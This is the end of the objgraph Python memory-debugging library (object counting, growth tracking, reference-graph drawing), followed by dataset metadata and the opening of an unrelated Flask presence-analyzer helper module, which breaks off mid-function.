If ``filter`` is specified, it should be a function taking one argument and
returning a boolean. Objects for which ``filter(obj)`` returns ``False``
will be ignored.
The caveats documented in :func:`typestats` apply.
Example:
>>> show_most_common_types(limit=5)
tuple 8959
function 2442
wrapper_descriptor 1048
dict 953
builtin_function_or_method 800
.. versionadded:: 1.1
.. versionchanged:: 1.7
New parameter: ``objects``.
.. versionchanged:: 1.8
New parameter: ``shortnames``.
.. versionchanged:: 3.0
New parameter: ``file``.
.. versionchanged:: 3.1.3
New parameter: ``filter``.
"""
if file is None:
file = sys.stdout
stats = most_common_types(limit, objects, shortnames=shortnames,
filter=filter)
width = max(len(name) for name, count in stats)
for name, count in stats:
file.write('%-*s %i\n' % (width, name, count))
def growth(limit=10, peak_stats={}, shortnames=True, filter=None):
"""Count the increase in peak object since last call.
Returns a list of (type_name, total_count, increase_delta),
descending order by increase_delta.
Limits the output to ``limit`` largest deltas. You may set ``limit`` to
None to see all of them.
Uses and updates ``peak_stats``, a dictionary from type names to previously
seen peak object counts. Usually you don't need to pay attention to this
argument.
If ``filter`` is specified, it should be a function taking one argument and
returning a boolean. Objects for which ``filter(obj)`` returns ``False``
will be ignored.
The caveats documented in :func:`typestats` apply.
Example:
>>> growth(2)
[(tuple, 12282, 10), (dict, 1922, 7)]
.. versionadded:: 3.3.0
"""
gc.collect()
stats = typestats(shortnames=shortnames, filter=filter)
deltas = {}
for name, count in iteritems(stats):
old_count = peak_stats.get(name, 0)
if count > old_count:
deltas[name] = count - old_count
peak_stats[name] = count
deltas = sorted(deltas.items(), key=operator.itemgetter(1),
reverse=True)
if limit:
deltas = deltas[:limit]
return [(name, stats[name], delta) for name, delta in deltas]
def show_growth(limit=10, peak_stats=None, shortnames=True, file=None,
filter=None):
"""Show the increase in peak object counts since last call.
if ``peak_stats`` is None, peak object counts will recorded in
func `growth`, and your can record the counts by yourself with set
``peak_stats`` to a dictionary.
The caveats documented in :func:`growth` apply.
Example:
>>> show_growth()
wrapper_descriptor 970 +14
tuple 12282 +10
dict 1922 +7
...
.. versionadded:: 1.5
.. versionchanged:: 1.8
New parameter: ``shortnames``.
.. versionchanged:: 2.1
New parameter: ``file``.
.. versionchanged:: 3.1.3
New parameter: ``filter``.
"""
if peak_stats is None:
result = growth(limit, shortnames=shortnames, filter=filter)
else:
result = growth(limit, peak_stats, shortnames, filter)
if result:
if file is None:
file = sys.stdout
width = max(len(name) for name, _, _ in result)
for name, count, delta in result:
file.write('%-*s%9d %+9d\n' % (width, name, count, delta))
def get_new_ids(skip_update=False, limit=10, sortby='deltas',
shortnames=None, file=None, _state={}):
"""Find and display new objects allocated since last call.
Shows the increase in object counts since last call to this
function and returns the memory address ids for new objects.
Returns a dictionary mapping object type names to sets of object IDs
that have been created since the last time this function was called.
``skip_update`` (bool): If True, returns the same dictionary that
was returned during the previous call without updating the internal
state or examining the objects currently in memory.
``limit`` (int): The maximum number of rows that you want to print
data for. Use 0 to suppress the printing. Use None to print everything.
``sortby`` (str): This is the column that you want to sort by in
descending order. Possible values are: 'old', 'current', 'new',
'deltas'
``shortnames`` (bool): If True, classes with the same name but
defined in different modules will be lumped together. If False,
all type names will be qualified with the module name. If None (default),
``get_new_ids`` will remember the value from previous calls, so it's
enough to prime this once. By default the primed value is True.
``_state`` (dict): Stores old, current, and new_ids in memory.
It is used by the function to store the internal state between calls.
Never pass in this argument unless you know what you're doing.
The caveats documented in :func:`growth` apply.
When one gets new_ids from :func:`get_new_ids`, one can use
:func:`at_addrs` to get a list of those objects. Then one can iterate over
the new objects, print out what they are, and call :func:`show_backrefs` or
:func:`show_chain` to see where they are referenced.
Example:
>>> _ = get_new_ids() # store current objects in _state
>>> _ = get_new_ids() # current_ids become old_ids in _state
>>> a = [0, 1, 2] # list we don't know about
>>> b = [3, 4, 5] # list we don't know about
>>> new_ids = get_new_ids(limit=3) # we see new lists
======================================================================
Type Old_ids Current_ids New_ids Count_Deltas
======================================================================
list 324 326 +3 +2
dict 1125 1125 +0 +0
wrapper_descriptor 1001 1001 +0 +0
======================================================================
>>> new_lists = at_addrs(new_ids['list'])
>>> a in new_lists
True
>>> b in new_lists
True
.. versionadded:: 3.4
"""
if not _state:
_state['old'] = collections.defaultdict(set)
_state['current'] = collections.defaultdict(set)
_state['new'] = collections.defaultdict(set)
_state['shortnames'] = True
new_ids = _state['new']
if skip_update:
return new_ids
old_ids = _state['old']
current_ids = _state['current']
if shortnames is None:
shortnames = _state['shortnames']
else:
_state['shortnames'] = shortnames
gc.collect()
objects = gc.get_objects()
for class_name in old_ids:
old_ids[class_name].clear()
for class_name, ids_set in current_ids.items():
old_ids[class_name].update(ids_set)
for class_name in current_ids:
current_ids[class_name].clear()
for o in objects:
if shortnames:
class_name = _short_typename(o)
else:
class_name = _long_typename(o)
id_number = id(o)
current_ids[class_name].add(id_number)
for class_name in new_ids:
new_ids[class_name].clear()
rows = []
keys_to_remove = []
for class_name in current_ids:
num_old = len(old_ids[class_name])
num_current = len(current_ids[class_name])
if num_old == 0 and num_current == 0:
# remove the key from our dicts if we don't have any old or
# current class_name objects
keys_to_remove.append(class_name)
continue
new_ids_set = current_ids[class_name] - old_ids[class_name]
new_ids[class_name].update(new_ids_set)
num_new = len(new_ids_set)
num_delta = num_current - num_old
row = (class_name, num_old, num_current, num_new, num_delta)
rows.append(row)
for key in keys_to_remove:
del old_ids[key]
del current_ids[key]
del new_ids[key]
index_by_sortby = {'old': 1, 'current': 2, 'new': 3, 'deltas': 4}
rows.sort(key=operator.itemgetter(index_by_sortby[sortby], 0),
reverse=True)
if limit is not None:
rows = rows[:limit]
if not rows:
return new_ids
if file is None:
file = sys.stdout
width = max(len(row[0]) for row in rows)
print('='*(width+13*4), file=file)
print('%-*s%13s%13s%13s%13s' %
(width, 'Type', 'Old_ids', 'Current_ids', 'New_ids', 'Count_Deltas'),
file=file)
print('='*(width+13*4), file=file)
for row_class, old, current, new, delta in rows:
print('%-*s%13d%13d%+13d%+13d' %
(width, row_class, old, current, new, delta), file=file)
print('='*(width+13*4), file=file)
return new_ids
def get_leaking_objects(objects=None):
"""Return objects that do not have any referents.
These could indicate reference-counting bugs in C code. Or they could
be legitimate.
Note that the GC does not track simple objects like int or str.
.. versionadded:: 1.7
"""
if objects is None:
gc.collect()
objects = gc.get_objects()
try:
ids = set(id(i) for i in objects)
for i in objects:
ids.difference_update(id(j) for j in gc.get_referents(i))
# this then is our set of objects without referrers
return [i for i in objects if id(i) in ids]
finally:
del objects, i # clear cyclic references to frame
def by_type(typename, objects=None):
"""Return objects tracked by the garbage collector with a given class name.
Example:
>>> by_type('MyClass')
[<mymodule.MyClass object at 0x...>]
Note that the GC does not track simple objects like int or str.
.. versionchanged:: 1.7
New parameter: ``objects``.
.. versionchanged:: 1.8
Accepts fully-qualified type names (i.e. 'package.module.ClassName')
as well as short type names (i.e. 'ClassName').
"""
if objects is None:
objects = gc.get_objects()
try:
if '.' in typename:
return [o for o in objects if _long_typename(o) == typename]
else:
return [o for o in objects if _short_typename(o) == typename]
finally:
del objects # clear cyclic references to frame
def at(addr):
"""Return an object at a given memory address.
The reverse of id(obj):
>>> at(id(obj)) is obj
True
Note that this function does not work on objects that are not tracked by
the GC (e.g. ints or strings).
"""
for o in gc.get_objects():
if id(o) == addr:
return o
return None
def at_addrs(address_set):
"""Return a list of objects for a given set of memory addresses.
The reverse of [id(obj1), id(obj2), ...]. Note that objects are returned
in an arbitrary order.
When one gets ``new_ids`` from :func:`get_new_ids`, one can use this
function to get a list of those objects. Then one can iterate over the new
objects, print out what they are, and call :func:`show_backrefs` or
:func:`show_chain` to see where they are referenced.
>>> a = [0, 1, 2]
>>> new_ids = get_new_ids()
>>> new_lists = at_addrs(new_ids['list'])
>>> a in new_lists
True
Note that this function does not work on objects that are not tracked
by the GC (e.g. ints or strings).
.. versionadded:: 3.4
"""
res = []
for o in gc.get_objects():
if id(o) in address_set:
res.append(o)
return res
def find_ref_chain(obj, predicate, max_depth=20, extra_ignore=()):
"""Find a shortest chain of references leading from obj.
The end of the chain will be some object that matches your predicate.
``predicate`` is a function taking one argument and returning a boolean.
``max_depth`` limits the search depth.
``extra_ignore`` can be a list of object IDs to exclude those objects from
your search.
Example:
>>> find_ref_chain(obj, lambda x: isinstance(x, MyClass))
[obj, ..., <MyClass object at ...>]
Returns ``[obj]`` if such a chain could not be found.
.. versionadded:: 1.7
"""
return _find_chain(obj, predicate, gc.get_referents,
max_depth=max_depth, extra_ignore=extra_ignore)[::-1]
def find_backref_chain(obj, predicate, max_depth=20, extra_ignore=()):
"""Find a shortest chain of references leading to obj.
The start of the chain will be some object that matches your predicate.
``predicate`` is a function taking one argument and returning a boolean.
``max_depth`` limits the search depth.
``extra_ignore`` can be a list of object IDs to exclude those objects from
your search.
Example:
>>> find_backref_chain(obj, is_proper_module)
[<module ...>, ..., obj]
Returns ``[obj]`` if such a chain could not be found.
.. versionchanged:: 1.5
Returns ``obj`` instead of ``None`` when a chain could not be found.
"""
return _find_chain(obj, predicate, gc.get_referrers,
max_depth=max_depth, extra_ignore=extra_ignore)
def show_backrefs(objs, max_depth=3, extra_ignore=(), filter=None, too_many=10,
highlight=None, filename=None, extra_info=None,
refcounts=False, shortnames=True, output=None,
extra_node_attrs=None):
"""Generate an object reference graph ending at ``objs``.
The graph will show you what objects refer to ``objs``, directly and
indirectly.
``objs`` can be a single object, or it can be a list of objects. If
unsure, wrap the single object in a new list.
``filename`` if specified, can be the name of a .dot or a image
file, whose extension indicates the desired output format; note
that output to a specific format is entirely handled by GraphViz:
if the desired format is not supported, you just get the .dot
file. If ``filename`` and ``output`` are not specified, ``show_backrefs``
will try to display the graph inline (if you're using IPython), otherwise
it'll try to produce a .dot file and spawn a viewer (xdot). If xdot is
not available, ``show_backrefs`` will convert the .dot file to a
.png and print its name.
``output`` if specified, the GraphViz output will be written to this
file object. ``output`` and ``filename`` should not both be specified.
Use ``max_depth`` and ``too_many`` to limit the depth and breadth of the
graph.
Use ``filter`` (a predicate) and ``extra_ignore`` (a list of object IDs) to
remove undesired objects from the graph.
Use ``highlight`` (a predicate) to highlight certain graph nodes in blue.
Use ``extra_info`` (a function taking one argument and returning a
string) to report extra information for objects.
Use ``extra_node_attrs`` (a function taking the current object as argument,
returning a dict of strings) to add extra attributes to the nodes. See
https://www.graphviz.org/doc/info/attrs.html for a list of possible node
attributes.
Specify ``refcounts=True`` if you want to see reference counts.
These will mostly match the number of arrows pointing to an object,
but can be different for various reasons.
Specify ``shortnames=False`` if you want to see fully-qualified type
names ('package.module.ClassName'). By default you get to see only the
class name part.
Examples:
>>> show_backrefs(obj)
>>> show_backrefs([obj1, obj2])
>>> show_backrefs(obj, max_depth=5)
>>> show_backrefs(obj, filter=lambda x: not inspect.isclass(x))
>>> show_backrefs(obj, highlight=inspect.isclass)
>>> show_backrefs(obj, extra_ignore=[id(locals())])
>>> show_backrefs(obj, extra_node_attrs=lambda x: dict(URL=str(id(x))))
.. versionchanged:: 1.3
New parameters: ``filename``, ``extra_info``.
.. versionchanged:: 1.5
New parameter: ``refcounts``.
.. versionchanged:: 1.8
New parameter: ``shortnames``.
.. versionchanged:: 2.0
New parameter: ``output``.
.. versionchanged:: 3.5
New parameter: ``extra_node_attrs``.
"""
# For show_backrefs(), it makes sense to stop when reaching a
# module because you'll end up in sys.modules and explode the
# graph with useless clutter. That's why we're specifying
# cull_func here, but not in show_graph().
return _show_graph(objs, max_depth=max_depth, extra_ignore=extra_ignore,
filter=filter, too_many=too_many, highlight=highlight,
edge_func=gc.get_referrers, swap_source_target=False,
filename=filename, output=output, extra_info=extra_info,
refcounts=refcounts, shortnames=shortnames,
cull_func=is_proper_module,
extra_node_attrs=extra_node_attrs)
def show_refs(objs, max_depth=3, extra_ignore=(), filter=None, too_many=10,
highlight=None, filename=None, extra_info=None,
refcounts=False, shortnames=True, output=None,
extra_node_attrs=None):
"""Generate an object reference graph starting at ``objs``.
The graph will show you what objects are reachable from ``objs``, directly
and indirectly.
``objs`` can be a single object, or it can be a list of objects. If
unsure, wrap the single object in a new list.
``filename`` if specified, can be the name of a .dot or a image
file, whose extension indicates the desired output format; note
that output to a specific format is entirely handled by GraphViz:
if the desired format is not supported, you just get the .dot
file. If ``filename`` and ``output`` is not specified, ``show_refs`` will
try to display the graph inline (if you're using IPython), otherwise it'll
try to produce a .dot file and spawn a viewer (xdot). If xdot is
not available, ``show_refs`` will convert the .dot file to a
.png and print its name.
``output`` if specified, the GraphViz output will be written to this
file object. ``output`` and ``filename`` should not both be specified.
Use ``max_depth`` and ``too_many`` to limit the depth and breadth of the
graph.
Use ``filter`` (a predicate) and ``extra_ignore`` (a list of object IDs) to
remove undesired objects from the graph.
Use ``highlight`` (a predicate) to highlight certain graph nodes in blue.
Use ``extra_info`` (a function returning a string) to report extra
information for objects.
Use ``extra_node_attrs`` (a function taking the current object as argument,
returning a dict of strings) to add extra attributes to the nodes. See
https://www.graphviz.org/doc/info/attrs.html for a list of possible node
attributes.
Specify ``refcounts=True`` if you want to see reference counts.
Examples:
>>> show_refs(obj)
>>> show_refs([obj1, obj2])
>>> show_refs(obj, max_depth=5)
>>> show_refs(obj, filter=lambda x: not inspect.isclass(x))
>>> show_refs(obj, highlight=inspect.isclass)
>>> show_refs(obj, extra_ignore=[id(locals())])
>>> show_refs(obj, extra_node_attrs=lambda x: dict(URL=str(id(x))))
.. versionadded:: 1.1
.. versionchanged:: 1.3
New parameters: ``filename``, ``extra_info``.
.. versionchanged:: 1.5
Follows references from module objects instead of stopping.
New parameter: ``refcounts``.
.. versionchanged:: 1.8
New parameter: ``shortnames``.
.. versionchanged:: 2.0
New parameter: ``output``.
.. versionchanged:: 3.5
New parameter: ``extra_node_attrs``.
"""
return _show_graph(objs, max_depth=max_depth, extra_ignore=extra_ignore,
filter=filter, too_many=too_many, highlight=highlight,
edge_func=gc.get_referents, swap_source_target=True,
filename=filename, extra_info=extra_info,
refcounts=refcounts, shortnames=shortnames,
output=output, extra_node_attrs=extra_node_attrs)
def show_chain(*chains, **kw):
"""Show a chain (or several chains) of object references.
Useful in combination with :func:`find_ref_chain` or
:func:`find_backref_chain`, e.g.
>>> show_chain(find_backref_chain(obj, is_proper_module))
You can specify if you want that chain traced backwards or forwards
by passing a ``backrefs`` keyword argument, e.g.
>>> show_chain(find_ref_chain(obj, is_proper_module),
... backrefs=False)
Ideally this shouldn't matter, but for some objects
:func:`gc.get_referrers` and :func:`gc.get_referents` are not perfectly
symmetrical.
You can specify ``highlight``, ``extra_info``, ``refcounts``,
``shortnames``, ``filename`` or ``output`` arguments like for
:func:`show_backrefs` or :func:`show_refs`.
.. versionadded:: 1.5
.. versionchanged:: 1.7
New parameter: ``backrefs``.
.. versionchanged:: 2.0
New parameter: ``output``.
"""
backrefs = kw.pop('backrefs', True)
chains = [chain for chain in chains if chain] # remove empty ones
def in_chains(x, ids=set(map(id, itertools.chain(*chains)))):
return id(x) in ids
max_depth = max(map(len, chains)) - 1
if backrefs:
show_backrefs([chain[-1] for chain in chains], max_depth=max_depth,
filter=in_chains, **kw)
else:
show_refs([chain[0] for chain in chains], max_depth=max_depth,
filter=in_chains, **kw)
def is_proper_module(obj):
"""
Returns ``True`` if ``obj`` can be treated like a garbage collector root.
That is, if ``obj`` is a module that is in ``sys.modules``.
>>> import types
>>> is_proper_module([])
False
>>> is_proper_module(types)
True
>>> is_proper_module(types.ModuleType('foo'))
False
.. versionadded:: 1.8
"""
return (
inspect.ismodule(obj)
and obj is sys.modules.get(getattr(obj, '__name__', None))
)
#
# Internal helpers
#
def _find_chain(obj, predicate, edge_func, max_depth=20, extra_ignore=()):
queue = [obj]
depth = {id(obj): 0}
parent = {id(obj): None}
ignore = set(extra_ignore)
ignore.add(id(extra_ignore))
ignore.add(id(queue))
ignore.add(id(depth))
ignore.add(id(parent))
ignore.add(id(ignore))
ignore.add(id(sys._getframe())) # this function
ignore.add(id(sys._getframe(1))) # find_chain/find_backref_chain
gc.collect()
while queue:
target = queue.pop(0)
if predicate(target):
chain = [target]
while parent[id(target)] is not None:
target = parent[id(target)]
chain.append(target)
return chain
tdepth = depth[id(target)]
if tdepth < max_depth:
referrers = edge_func(target)
ignore.add(id(referrers))
for source in referrers:
if id(source) in ignore:
continue
if id(source) not in depth:
depth[id(source)] = tdepth + 1
parent[id(source)] = target
queue.append(source)
return [obj] # not found
def _show_graph(objs, edge_func, swap_source_target,
max_depth=3, extra_ignore=(), filter=None, too_many=10,
highlight=None, filename=None, extra_info=None,
refcounts=False, shortnames=True, output=None,
cull_func=None, extra_node_attrs=None):
if not _isinstance(objs, (list, tuple)):
objs = [objs]
is_interactive = False
if filename and output:
raise ValueError('Cannot specify both output and filename.')
elif output:
f = output
elif filename and filename.endswith('.dot'):
f = codecs.open(filename, 'w', encoding='utf-8')
dot_filename = filename
elif IS_INTERACTIVE and not filename:
is_interactive = True
f = StringIO()
else:
fd, dot_filename = tempfile.mkstemp(prefix='objgraph-',
suffix='.dot', text=True)
f = os.fdopen(fd, "w")
if getattr(f, 'encoding', None): # pragma: PY3
# Python 3 will wrap the file in the user's preferred encoding
# Re-wrap it for utf-8
import io
f = io.TextIOWrapper(f.detach(), 'utf-8')
f.write('digraph ObjectGraph {\n'
' node[shape=box, style=filled, fillcolor=white];\n')
queue = []
depth = {}
ignore = set(extra_ignore)
ignore.add(id(objs))
ignore.add(id(extra_ignore))
ignore.add(id(queue))
ignore.add(id(depth))
ignore.add(id(ignore))
ignore.add(id(sys._getframe())) # this function
ignore.add(id(sys._getframe().f_locals))
ignore.add(id(sys._getframe(1))) # show_refs/show_backrefs
ignore.add(id(sys._getframe(1).f_locals))
for obj in objs:
f.write(' %s[fontcolor=red];\n' % (_obj_node_id(obj)))
depth[id(obj)] = 0
queue.append(obj)
del obj
gc.collect()
nodes = 0
while queue:
nodes += 1
# The names "source" and "target" are reversed here because
# originally there was just show_backrefs() and we were
# traversing the reference graph backwards.
target = queue.pop(0)
tdepth = depth[id(target)]
f.write(' %s[label="%s"%s];\n' % (_obj_node_id(target),
_obj_label(target, extra_info,
refcounts, shortnames),
_obj_attrs(target,
extra_node_attrs)))
h, s, v = _gradient((0, 0, 1), (0, 0, .3), tdepth, max_depth)
if inspect.ismodule(target):
h = .3
s = 1
if highlight and highlight(target):
h = .6
s = .6
v = 0.5 + v * 0.5
f.write(' %s[fillcolor="%g,%g,%g"];\n'
% (_obj_node_id(target), h, s, v))
if v < 0.5:
f.write(' %s[fontcolor=white];\n' % (_obj_node_id(target)))
if hasattr(getattr(target, '__class__', None), '__del__'):
f.write(' %s->%s_has_a_del[color=red,style=dotted,'
'len=0.25,weight=10];\n' % (_obj_node_id(target),
_obj_node_id(target)))
f.write(' %s_has_a_del[label="__del__",shape=doublecircle,'
'height=0.25,color=red,fillcolor="0,.5,1",fontsize=6];\n'
% (_obj_node_id(target)))
if tdepth >= max_depth:
continue
if cull_func is not None and cull_func(target):
continue
neighbours = edge_func(target)
ignore.add(id(neighbours))
n = 0
skipped = 0
for source in neighbours:
if id(source) in ignore:
continue
if filter and not filter(source):
continue
if n >= too_many:
skipped += 1
continue
if swap_source_target:
srcnode, tgtnode = target, source
else:
srcnode, tgtnode = source, target
elabel = _edge_label(srcnode, tgtnode, shortnames)
f.write(' %s -> %s%s;\n' % (_obj_node_id(srcnode),
_obj_node_id(tgtnode), elabel))
if id(source) not in depth:
depth[id(source)] = tdepth + 1
queue.append(source)
n += 1
del source
del neighbours
if skipped > 0:
h, s, v = _gradient((0, 1, 1), (0, 1, .3), tdepth + 1, max_depth)
if swap_source_target:
label = "%d more references" % skipped
edge = "%s->too_many_%s" % (_obj_node_id(target),
_obj_node_id(target))
else:
label = "%d more backreferences" % skipped
edge = "too_many_%s->%s" % (_obj_node_id(target),
_obj_node_id(target))
f.write(' %s[color=red,style=dotted,len=0.25,weight=10];\n'
% edge)
f.write(' too_many_%s[label="%s",shape=box,height=0.25,'
'color=red,fillcolor="%g,%g,%g",fontsize=6];\n'
% (_obj_node_id(target), label, h, s, v))
f.write(' too_many_%s[fontcolor=white];\n'
% (_obj_node_id(target)))
f.write("}\n")
if output:
return
if is_interactive:
return graphviz.Source(f.getvalue())
else:
# The file should only be closed if this function was in charge of
# opening the file.
f.close()
print("Graph written to %s (%d nodes)" % (dot_filename, nodes))
_present_graph(dot_filename, filename)
def _present_graph(dot_filename, filename=None):
"""Present a .dot file to the user in the requested fashion.
If ``filename`` is provided, runs ``dot`` to convert the .dot file
into the desired format, determined by the filename extension.
If ``filename`` is not provided, tries to launch ``xdot``, a
graphical .dot file viewer. If ``xdot`` is not present on the system,
converts the graph to a PNG.
"""
if filename == dot_filename:
# nothing to do, the user asked for a .dot file and got it
return
if not filename and _program_in_path('xdot'):
print("Spawning graph viewer (xdot)")
subprocess.Popen(['xdot', dot_filename], close_fds=True)
elif _program_in_path('dot'):
if not filename:
print("Graph viewer (xdot) not found, generating a png instead")
filename = dot_filename[:-4] + '.png'
stem, ext = os.path.splitext(filename)
cmd = ['dot', '-T' + ext[1:], '-o' + filename, dot_filename]
dot = subprocess.Popen(cmd, close_fds=False)
dot.wait()
if dot.returncode != 0:
# XXX: shouldn't this go to stderr or a log?
print('dot failed (exit code %d) while executing "%s"'
% (dot.returncode, ' '.join(cmd)))
else:
print("Image generated as %s" % filename)
else:
if not filename:
print("Graph viewer (xdot) and image renderer (dot) not found,"
" not doing anything else")
else:
print("Image renderer (dot) not found, not doing anything else")
def _obj_node_id(obj):
return ('o%d' % id(obj)).replace('-', '_')
def _obj_attrs(obj, extra_node_attrs):
if extra_node_attrs is not None:
attrs = extra_node_attrs(obj)
return ", " + ", ".join('%s="%s"' % (name, _quote(value))
for name, value in sorted(iteritems(attrs))
if value is not None)
else:
return ""
def _obj_label(obj, extra_info=None, refcounts=False, shortnames=True):
if shortnames:
label = [_short_typename(obj)]
else:
label = [_long_typename(obj)]
if refcounts:
label[0] += ' [%d]' % (sys.getrefcount(obj) - 4)
# Why -4? To ignore the references coming from
# obj_label's frame (obj)
# show_graph's frame (target variable)
# sys.getrefcount()'s argument
# something else that doesn't show up in gc.get_referrers()
label.append(_safe_repr(obj))
if extra_info:
label.append(str(extra_info(obj)))
return _quote('\n'.join(label))
def _quote(s):
return (s.replace("\\", "\\\\")
.replace("\"", "\\\"")
.replace("\n", "\\n")
.replace("\0", "\\\\0"))
def _get_obj_type(obj):
objtype = type(obj)
if type(obj) == InstanceType: # pragma: PY2 -- no old-style classes on PY3
objtype = obj.__class__
return objtype
def _short_typename(obj):
return _get_obj_type(obj).__name__
def _long_typename(obj):
objtype = _get_obj_type(obj)
name = objtype.__name__
module = getattr(objtype, '__module__', None)
if module:
return '%s.%s' % (module, name)
else:
return name
def _safe_repr(obj):
try:
return _short_repr(obj)
except Exception:
return '(unrepresentable)'
def _name_or_repr(value):
try:
result = value.__name__
except AttributeError:
result = repr(value)[:40]
if _isinstance(result, basestring):
return result
else:
return repr(value)[:40]
def _short_repr(obj):
if _isinstance(obj, (type, types.ModuleType, types.BuiltinMethodType,
types.BuiltinFunctionType)):
return _name_or_repr(obj)
if _isinstance(obj, types.MethodType):
name = _name_or_repr(obj.__func__)
if obj.__self__:
return name + ' (bound)'
else: # pragma: PY2 -- no unbound methods on Python 3
return name
# NB: types.LambdaType is an alias for types.FunctionType!
if _isinstance(obj, types.LambdaType) and obj.__name__ == '<lambda>':
return 'lambda: %s:%s' % (os.path.basename(obj.__code__.co_filename),
obj.__code__.co_firstlineno)
if _isinstance(obj, types.FrameType):
return '%s:%s' % (obj.f_code.co_filename, obj.f_lineno)
if _isinstance(obj, (tuple, list, dict, set)):
return '%d items' % len(obj)
return repr(obj)[:40]
def _gradient(start_color, end_color, depth, max_depth):
if max_depth == 0:
# avoid division by zero
return start_color
h1, s1, v1 = start_color
h2, s2, v2 = end_color
f = float(depth) / max_depth
h = h1 * (1-f) + h2 * f
s = s1 * (1-f) + s2 * f
v = v1 * (1-f) + v2 * f
return h, s, v
def _edge_label(source, target, shortnames=True):
if (_isinstance(target, dict)
and target is getattr(source, '__dict__', None)):
return ' [label="__dict__",weight=10]'
if _isinstance(source, types.FrameType):
if target is source.f_locals:
return ' [label="f_locals",weight=10]'
if target is source.f_globals:
return ' [label="f_globals",weight=10]'
if _isinstance(source, types.MethodType):
try:
if target is source.__self__:
return ' [label="__self__",weight=10]'
if target is source.__func__:
return ' [label="__func__",weight=10]'
except AttributeError: # pragma: nocover
# Python < 2.6 compatibility
if target is source.im_self:
return ' [label="im_self",weight=10]'
if target is source.im_func:
return ' [label="im_func",weight=10]'
if _isinstance(source, types.FunctionType):
for k in dir(source):
if target is getattr(source, k):
return ' [label="%s",weight=10]' % _quote(k)
if _isinstance(source, dict):
for k, v in iteritems(source):
if v is target:
if _isinstance(k, basestring) and _is_identifier(k):
return ' [label="%s",weight=2]' % _quote(k)
else:
if shortnames:
tn = _short_typename(k)
else:
tn = _long_typename(k)
return ' [label="%s"]' % _quote(tn + "\n" + _safe_repr(k))
return ''
_is_identifier = re.compile('[a-zA-Z_][a-zA-Z_0-9]*$').match
def _program_in_path(program):
# XXX: Consider using distutils.spawn.find_executable or shutil.which
path = os.environ.get("PATH", os.defpath).split(os.pathsep)
path = [os.path.join(dir, program) for dir in path]
path = [True for file in path
if os.path.isfile(file) or os.path.isfile(file + '.exe')]
return bool(path)
| {
"content_hash": "ec10514dbef81b5efdc566235f2da942",
"timestamp": "",
"source": "github",
"line_count": 1259,
"max_line_length": 79,
"avg_line_length": 34.5758538522637,
"alnum_prop": 0.5882015115664698,
"repo_name": "mgedmin/objgraph",
"id": "6c2c9417bb79e044fdcdcd862260a58bf649f1cd",
"size": "43531",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "objgraph.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "8958"
},
{
"name": "Python",
"bytes": "70810"
}
],
"symlink_target": ""
} |
"""
Helper functions used in views.
"""
import calendar
import csv
import logging
import time
import locale
from datetime import datetime
from flask import Response
from functools import wraps
from json import dumps
from threading import Lock
from presence_analyzer.main import APP
locale.setlocale(locale.LC_COLLATE, 'pl_PL.utf8')
CACHE_STORAGE = {}
LOG = logging.getLogger(__name__)
def jsonify(function):
"""
Creates a response with the JSON representation of wrapped function result.
"""
@wraps(function)
def inner(*args, **kwargs):
"""
This docstring will be overridden by @wraps decorator.
"""
return Response(
dumps(function(*args, **kwargs)),
mimetype='application/json'
)
return inner
def memoize(duration_time):
"""
Cache function response for a given amount of time in seconds.
"""
lock = Lock()
def _memoize(function):
"""
This docstring will be overridden.
"""
@wraps(function)
def __memoize(*args, **kwargs):
"""
This docstring will be overridden by @wraps decorator.
"""
f_name = function.__name__
arguments = [str(arg) for arg in args]
kwarguments = [
'%s:%s' % (key, hash(value)) for key, value in kwargs.items()
]
time_now = int(time.time())
key = '{}{}{}'.format(f_name, arguments, kwarguments)
with lock:
if (key in CACHE_STORAGE and
time_now - CACHE_STORAGE[key]['time'] < duration_time):
return CACHE_STORAGE[key]['value']
value = function(*args, **kwargs)
CACHE_STORAGE[key] = {
'time': time_now,
'value': value
}
return value
return __memoize
return _memoize
@memoize(600)
def get_data():
"""
Extracts presence data from CSV file and groups it by user_id.
It creates structure like this:
data = {
'user_id': {
datetime.date(2013, 10, 1): {
'start': datetime.time(9, 0, 0),
'end': datetime.time(17, 30, 0),
},
datetime.date(2013, 10, 2): {
'start': datetime.time(8, 30, 0),
'end': datetime.time(16, 45, 0),
},
}
}
"""
data = {}
with open(APP.config['DATA_CSV'], 'r') as csvfile:
presence_reader = csv.reader(csvfile, delimiter=',')
for i, row in enumerate(presence_reader):
if len(row) != 4:
# ignore header and footer lines
continue
try:
user_id = int(row[0])
date = datetime.strptime(row[1], '%Y-%m-%d').date()
start = datetime.strptime(row[2], '%H:%M:%S').time()
end = datetime.strptime(row[3], '%H:%M:%S').time()
except (ValueError, TypeError):
LOG.debug('Problem with line %d: ', i, exc_info=True)
data.setdefault(user_id, {})[date] = {'start': start, 'end': end}
return data
def group_by_weekday(items):
"""
Groups presence entries by weekday.
"""
result = [[], [], [], [], [], [], []] # one list for every day in week
for date in items:
start = items[date]['start']
end = items[date]['end']
result[date.weekday()].append(interval(start, end))
return result
def seconds_since_midnight(time_data):
"""
Calculates amount of seconds since midnight.
"""
return time_data.hour * 3600 + time_data.minute * 60 + time_data.second
def interval(start, end):
"""
Calculates inverval in seconds between two datetime.time objects.
"""
return seconds_since_midnight(end) - seconds_since_midnight(start)
def mean(items):
"""
Calculates arithmetic mean. Returns zero for empty lists.
"""
return float(sum(items)) / len(items) if len(items) > 0 else 0
def mean_presence_hours(items):
"""
Calculate start and end of presence time of given user grouped by weekday.
"""
week = {i: {'start': [], 'end': []} for i in xrange(7)}
for day in items:
week[day.weekday()]['start'].append(
seconds_since_midnight(items[day]['start'])
)
week[day.weekday()]['end'].append(
seconds_since_midnight(items[day]['end'])
)
return [
[calendar.day_abbr[k], mean(v['start']), mean(v['end'])]
for k, v in week.iteritems()
]
def parse_tree(root):
"""
Parsing xml root.
"""
server = {item.tag: item.text for item in root.getroot().find('server')}
url = '{}://{}:{}'.format(
server['protocol'],
server['host'],
server['port']
)
users_from_xml = root.getroot().find('users')
return sorted([
{
'user_id': int(user.get('id')),
'name': user.find('name').text,
'avatar': '{}{}'.format(url, user.find('avatar').text)
}
for user in users_from_xml
], key=lambda user: user['name'], cmp=locale.strcoll)
def get_all_days():
"""
Get list of all day dates from data.
"""
data = get_data()
days = {}
days = {
int(day.strftime('%y%m%d')): day.strftime('%d.%m.%y')
for user in data.keys()
for day in data[user]
if day.strftime('%d.%m.%y') not in days
}
return days
def get_employees(given_date):
"""
Get list of employees that have been working at given date.
"""
